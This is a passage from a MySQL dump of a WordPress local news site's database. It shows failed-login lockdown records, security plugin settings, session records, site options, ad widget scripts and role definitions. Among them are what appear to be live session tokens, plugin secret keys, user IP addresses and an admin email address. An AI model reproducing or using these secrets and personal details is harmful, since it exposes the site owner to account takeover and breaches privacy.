07:01:11','2021-08-11 08:01:11','168.62.9.114','login_fail',''),(144,0,'admin_seemore','2021-08-11 11:49:28','2021-08-11 12:49:28','168.62.9.114','login_fail',''),(145,0,'rosie-chester','2021-08-13 03:51:12','2021-08-13 04:51:12','34.134.191.116','login_fail',''),(146,1,'admin','2021-08-15 10:48:39','2021-08-15 11:48:39','5.188.62.76','login_fail',''),(147,1,'admin','2021-08-15 10:48:39','2021-08-15 11:48:39','5.188.62.76','login_fail',''),(148,1,'admin','2021-08-16 18:27:38','2021-08-16 19:27:38','20.98.219.247','login_fail',''),(149,0,'werkgroepaakies','2021-08-18 00:05:47','2021-08-18 01:05:47','62.210.122.74','login_fail',''),(150,1,'admin','2021-08-18 22:51:04','2021-08-18 23:51:04','5.188.62.76','login_fail',''),(151,1,'admin','2021-08-18 22:51:04','2021-08-18 23:51:04','5.188.62.76','login_fail',''),(152,1,'admin','2021-08-19 00:12:12','2021-08-19 01:12:12','5.188.62.76','login_fail',''),(153,1,'admin','2021-08-19 05:53:42','2021-08-19 06:53:42','5.188.62.76','login_fail',''),(154,1,'admin','2021-08-19 05:53:42','2021-08-19 06:53:42','5.188.62.76','login_fail',''),(155,0,'dailyjolly','2021-08-19 14:39:54','2021-08-19 15:39:54','5.188.62.76','login_fail',''),(156,0,'dailyjolly','2021-08-19 14:39:55','2021-08-19 15:39:55','5.188.62.76','login_fail',''),(157,0,'serva','2021-08-19 18:53:53','2021-08-19 19:53:53','104.233.173.17','login_fail',''),(158,1,'admin','2021-08-20 17:40:49','2021-08-20 18:40:49','35.236.75.245','login_fail',''),(159,0,'dairydm','2021-08-20 17:48:10','2021-08-20 18:48:10','195.154.167.133','login_fail',''),(160,0,'flaviofoss','2021-08-20 19:50:56','2021-08-20 20:50:56','62.210.180.146','login_fail',''),(161,1,'admin','2021-08-21 19:50:57','2021-08-21 20:50:57','192.236.177.124','login_fail',''),(162,1,'admin','2021-08-21 20:54:20','2021-08-21 21:54:20','192.236.177.124','login_fail',''),(163,1,'admin','2021-08-23 21:39:08','2021-08-23 22:39:08','34.125.29.167','login_fail',''),(164,1,'admin','2021-08-23 23:13:10','2021-08-24 00:13:10','45.138.24.59','login_fail',''),(165,1,'admin','2021-08-24 00:13:15','2021-08-24 01:13:15','45.138.24.59','login_fail',''),(166,1,'admin','2021-08-24 01:13:21','2021-08-24 02:13:21','45.138.24.59','login_fail','');
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_permanent_block`
--

DROP TABLE IF EXISTS `wp_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_permanent_block` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `blocked_ip` varchar(100) NOT NULL DEFAULT '',
  `block_reason` varchar(128) NOT NULL DEFAULT '',
  `country_origin` varchar(50) NOT NULL DEFAULT '',
  `blocked_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `unblock` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_permanent_block`
--

LOCK TABLES `wp_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_files`
--

DROP TABLE IF EXISTS `wp_cerber_files`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_files` (
  `scan_id` int(10) unsigned NOT NULL,
  `scan_type` int(10) unsigned NOT NULL DEFAULT 1,
  `scan_mode` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_step` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_name_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_name` text NOT NULL,
  `file_type` int(10) unsigned NOT NULL DEFAULT 0,
  `file_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_md5` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_hash_repo` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `hash_match` int(10) unsigned NOT NULL DEFAULT 0,
  `file_size` bigint(20) unsigned NOT NULL DEFAULT 0,
  `file_perms` int(11) NOT NULL DEFAULT 0,
  `file_writable` int(10) unsigned NOT NULL DEFAULT 0,
  `file_mtime` int(10) unsigned NOT NULL DEFAULT 0,
  `file_ext` varchar(255) NOT NULL DEFAULT '',
  `extra` text NOT NULL,
  PRIMARY KEY (`scan_id`,`file_name_hash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_files`
--

LOCK TABLES `wp_cerber_files` WRITE;
/*!40000 ALTER TABLE `wp_cerber_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cerber_files` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_sets`
--

DROP TABLE IF EXISTS `wp_cerber_sets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_sets` (
  `the_key` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `the_id` bigint(20) NOT NULL DEFAULT 0,
  `the_value` longtext NOT NULL,
  `expires` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`the_key`,`the_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_sets`
--

LOCK TABLES `wp_cerber_sets` WRITE;
/*!40000 ALTER TABLE `wp_cerber_sets` DISABLE KEYS */;
INSERT INTO `wp_cerber_sets` VALUES ('admin_message',0,'a:1:{i:0;s:68:\"A new version of WP Cerber Security is available. Please install it.\";}',0),('admin_notice',0,'a:0:{}',0),('boot_cerber_addons',0,'a:0:{}',0),('cerber_admin_wide',0,'',0),('cerber_user',1,'a:2:{s:10:\"last_login\";a:2:{s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:40:\"0c3c442ba67c66fa3227e09aeb8c763c79676604\";}s:11:\"2fa_history\";a:2:{i:0;i:2;i:1;i:1649844968;}}',0),('garbage_collector',0,'1675209372',0),('refresh_add_on_list',0,'0',0),('_background_tasks',0,'a:0:{}',0),('_cerberkey_',0,'a:3:{i:0;s:32:\"b36659a23fa01a3e3e067e9b5f82b7ec\";i:1;i:1649844732;i:4;s:40:\"SK//D9K32BNILSJO0YU7VWAZ46Q5THXME8RPFCG1\";}',0),('_cerber_mnemosyne',0,'a:3:{i:0;s:16:\"N5AFWEV9H3P7GLX8\";i:4;i:10;i:10;s:17:\"I8BVQ3KE5Y9C6MLXT\";}',0);
/*!40000 ALTER TABLE `wp_cerber_sets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_uss`
--

DROP TABLE IF EXISTS `wp_cerber_uss`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_uss` (
  `user_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `started` int(10) unsigned NOT NULL,
  `expires` int(10) unsigned NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `wp_session_token` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_uss`
--

LOCK TABLES `wp_cerber_uss` WRITE;
/*!40000 ALTER TABLE `wp_cerber_uss` DISABLE KEYS */;
INSERT INTO `wp_cerber_uss` VALUES (1,'185.175.113.72','',1649844463,1650017263,'','ab4dcc2559220efa1c4a4744bcaa4bea409dd82e1eb9d3f12f6d31af6e823b97'),(1,'185.175.113.72','',1649844968,1650017768,'utF0w83DgjZPQps6MiLGvTe4','99ef288f6d22b49cc095ada6e2dfe2dc0880b94fd9e770f8d4bf4d090bb28352'),(1,'185.175.113.72','',1649845332,1650018132,'wAd6Gms1RD3iyrEJYo9nMkU8','1d9ab111505b8f16da4fc7a70acdb8c8ecd8c9622ef3ac532a7965ab4f70872d');
/*!40000 ALTER TABLE `wp_cerber_uss` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=300 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=515179 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://www.dailyjolly.co.uk','yes'),(2,'home','https://www.dailyjolly.co.uk','yes'),(3,'blogname','Daily Jolly','yes'),(4,'blogdescription','Your Local News Site','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','amber.platts@vanillacircus.co.uk','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','','yes'),(11,'comments_notify','','no'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','','yes'),(20,'default_ping_status','','yes'),(21,'default_pingback_flag','','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','','yes'),(27,'moderation_notify','','yes'),(28,'permalink_structure','/blog/%postname%','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins1','a:10:{i:0;s:27:\"ad-inserter/ad-inserter.php\";i:1;s:19:\"akismet/akismet.php\";i:2;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:3;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:4;s:33:\"import-html-pages/html-import.php\";i:5;s:41:\"post-type-switcher/post-type-switcher.php\";i:6;s:47:\"quick-featured-images/quick-featured-images.php\";i:7;s:48:\"simple-301-redirects/wp-simple-301-redirects.php\";i:8;s:38:\"wp-find-and-replace/search-replace.php\";i:9;s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','hitmag','yes'),(41,'stylesheet','hitmag','yes'),(44,'comment_registration','','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','53496','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','posts','yes'),(54,'tag_base','','yes'),(55,'show_avatars','','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','1','yes'),(70,'close_comments_days_old','1','yes'),(71,'thread_comments','','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:7:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;i:3;a:3:{s:5:\"title\";s:8:\"About Us\";s:4:\"text\";s:379:\"Welcome to Daily Jolly, your local news site about all things eco related.\r\n\r\nHere we have latest news articles about what\'s going on in the world, especially information focused around eco friendly matters.\r\n\r\nThanks for visiting and we hope you enjoy!\r\n\r\nFor the latest news about technology, visit <a href=\"http://infopool.org.uk/\" target=\"_blank\" rel=\"noopener\">InfoPool</a>.\";s:6:\"filter\";s:7:\"content\";}i:4;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:212:\"Daily Jolly Website published by <a href=\"http://www.essaymarket.co.uk/coursework/\" target=\"_blank\" rel=\"noopener\">Essay Market</a> |  <a href=\"http://dxf.co.uk/\" target=\"_blank\" rel=\"noopener\">SEO agency DXF</a>\";s:6:\"filter\";s:7:\"content\";}i:6;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:327:\"<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<ins class=\"adsbygoogle\"\r\n     style=\"display:block\"\r\n     data-ad-client=\"ca-pub-2121528995419082\"\r\n     data-ad-slot=\"8029362605\"\r\n     data-ad-format=\"auto\"></ins>\r\n<script>\r\n(adsbygoogle = window.adsbygoogle || []).push({});\r\n</script>\";s:6:\"filter\";s:7:\"content\";}i:7;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:316:\"<script type=\"text/javascript\"><!--\r\ngoogle_ad_client = \"ca-pub-2121528995419082\";\r\n/* Square general 250 */\r\ngoogle_ad_slot = \"1723116242\";\r\ngoogle_ad_width = 250;\r\ngoogle_ad_height = 250;\r\n//-->\r\n</script>\r\n<script type=\"text/javascript\"\r\nsrc=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\r\n</script>\r\n\";s:6:\"filter\";s:7:\"content\";}i:8;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:329:\"<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<ins class=\"adsbygoogle\"\r\n     style=\"display:block\"\r\n     data-ad-client=\"ca-pub-2121528995419082\"\r\n     data-ad-slot=\"8029362605\"\r\n     data-ad-format=\"auto\"></ins>\r\n<script>\r\n(adsbygoogle = window.adsbygoogle || []).push({});\r\n</script>\r\n\";s:6:\"filter\";s:7:\"content\";}}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:4:{s:33:\"import-html-pages/html-import.php\";s:26:\"html_import_remove_options\";s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";s:27:\"redirection/redirection.php\";a:2:{i:0;s:17:\"Redirection_Admin\";i:1;s:16:\"plugin_uninstall\";}s:24:\"wordpress-seo/wp-seo.php\";s:14:\"__return_false\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','14','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wp_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:65:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:38:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;s:23:\"view_site_health_checks\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:34;s:9:\"show_date\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:8:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:6:\"text-4\";i:1;s:6:\"text-8\";}s:9:\"sidebar-1\";a:5:{i:0;s:8:\"search-2\";i:1;s:6:\"text-7\";i:2;s:14:\"recent-posts-